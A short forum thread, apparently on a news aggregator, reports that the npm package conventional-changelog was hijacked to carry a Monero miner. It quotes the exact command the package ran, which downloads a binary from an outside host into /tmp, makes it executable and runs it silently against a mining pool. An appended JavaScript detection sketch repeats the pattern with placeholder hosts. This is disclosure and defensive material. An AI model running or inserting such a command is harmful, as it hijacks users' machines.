NPM: conventional-changelog package hacked

2 points by feduzi, over 7 years ago

1 comment

feduzi, over 7 years ago

Some details (https://github.com/conventional-changelog/conventional-changelog/issues/279#issuecomment-365344112):

> This happened because of a security issue: conventional-changelog package was hacked, and it contained a Monero miner.

> I reported it to the devs and they unpublished it (and also conventional-changelog-preset-loader).

> They should re-add a safe version tagged with 1.1.3 to fix this issue.

The hacked package executes:

rm -rf /tmp/.debug && curl https://mnrlnt.blob.core.windows.net/mnr/Silence -o /tmp/.debug 2> /dev/null && chmod +x /tmp/.debug && /tmp/.debug -o stratum+tcp://pool.minexmr.com:4444 -u 4A9V5knGUM8PUdPSJbTox8b9mgTsfXByK49XKtEyqVayDxD6CFJe5dsexaM99x7MXFNTxZkYAr4YtcAXQMkNrFjnRPJGJFr.JL6_$(hostname -f | md5sum | cut -c1-8) -p x -t $(lscpu | grep 'CPU(s)'| grep -v ',' | awk '{print $2}' | head -n 1) 2> /dev/null &
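
A detection sketch for the command quoted in the comment above, added here as an example (it is not part of the original post or of the conventional-changelog project). It flags the behaviours visible in that command line: download to a temp path, `chmod +x` and execution of the same path, a stratum endpoint, a hostname-derived worker id, and silenced background execution. The rule names, the `analyzeCommand` function and both sample strings are constructed; where the command strings come from (package script entries, process audit records) is an assumption, since the comment does not say how the package invoked the command.

```javascript
// Added example: heuristics derived from the shape of the quoted command.
// Rule ids and analyzeCommand() are hypothetical names chosen for illustration.
const TEMP_PATH = String.raw`(?:/tmp|/var/tmp|/dev/shm)/[^\s;&|]+`;

const RULES = [
  // curl/wget writing its output to a file under a world-writable temp directory
  { id: 'download-to-temp', re: new RegExp(String.raw`\b(?:curl|wget)\b[^;&|]*\s-[oO]\s+(${TEMP_PATH})`) },
  // chmod +x on a file under a temp directory
  { id: 'chmod-exec-temp', re: new RegExp(String.raw`\bchmod\s+\+x\s+(${TEMP_PATH})`) },
  // mining pool endpoint passed on the command line
  { id: 'stratum-endpoint', re: /stratum\+(?:tcp|ssl):\/\/[\w.-]+:\d+/ },
  // worker id derived from the host name, as in $(hostname -f | md5sum | ...)
  { id: 'host-derived-id', re: /\$\(\s*hostname\b[^)]*\|\s*md5sum/ },
  // stderr discarded and the final process sent to the background
  { id: 'silenced-background', re: /2>\s*\/dev\/null\s*&\s*$/ },
];

function analyzeCommand(cmd) {
  const hits = RULES.filter((r) => r.re.test(cmd)).map((r) => r.id);
  const dl = cmd.match(RULES[0].re);
  const ch = cmd.match(RULES[1].re);
  const path = dl ? dl[1] : null;
  // Correlate: the downloaded path is made executable and then starts a command segment.
  const segments = cmd.split(/&&|\|\||;/).map((s) => s.trim());
  const executed = path !== null && segments.some((s) => s === path || s.startsWith(path + ' '));
  if (executed && ch && ch[1] === path) hits.push('drop-and-run');
  const suspicious = hits.includes('drop-and-run') || hits.includes('stratum-endpoint');
  return { hits, path, suspicious };
}

// Constructed samples: same structure as the quoted command, placeholder hosts and wallet.
const SAMPLE_MALICIOUS =
  'rm -rf /tmp/.debug && curl https://files.example.invalid/payload -o /tmp/.debug 2> /dev/null' +
  ' && chmod +x /tmp/.debug && /tmp/.debug -o stratum+tcp://pool.example.invalid:4444' +
  ' -u WALLET_PLACEHOLDER.ID_$(hostname -f | md5sum | cut -c1-8) -p x 2> /dev/null &';
const SAMPLE_BENIGN =
  'curl -fsSL https://registry.example.invalid/pkg.tgz -o ./pkg.tgz && tar xzf ./pkg.tgz';

for (const [name, cmd] of [['malicious', SAMPLE_MALICIOUS], ['benign', SAMPLE_BENIGN]]) {
  console.log(name, JSON.stringify(analyzeCommand(cmd)));
}
```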